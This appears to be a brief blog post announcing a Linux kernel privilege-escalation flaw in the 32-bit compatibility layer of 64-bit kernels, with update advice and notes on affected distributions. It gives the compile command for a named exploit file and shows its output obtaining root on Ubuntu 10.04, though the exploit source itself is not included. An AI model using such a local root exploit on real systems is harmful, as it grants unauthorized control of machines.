A new security flaw has been discovered in the Linux kernel, especially in the Compatibility Pack 32-bit. The exploit allows a single user to become root on a machine containing a 64-bit Linux kernel. The only way to counter this type of attack is to update its system.
Here is an example of using the exploit:
gcc -o ia32syscall_xpl ia32syscall_xpl.c
Then execute it like this:
resolved symbol commit_creds to 0xffffffff8108bd90
resolved symbol prepare_kernel_cred to 0xffffffff8108c170
mapping at 3f80000000
UID 0, EUID:0 GID:0, EGID:0
I have successfully tested this method on a live CD of Ubuntu 10.04 64-bit version. A complete list of impacted versions of Ubuntu is available here.
Redhat RHEL 5 does not seem affected by this flaw, according to this bug report.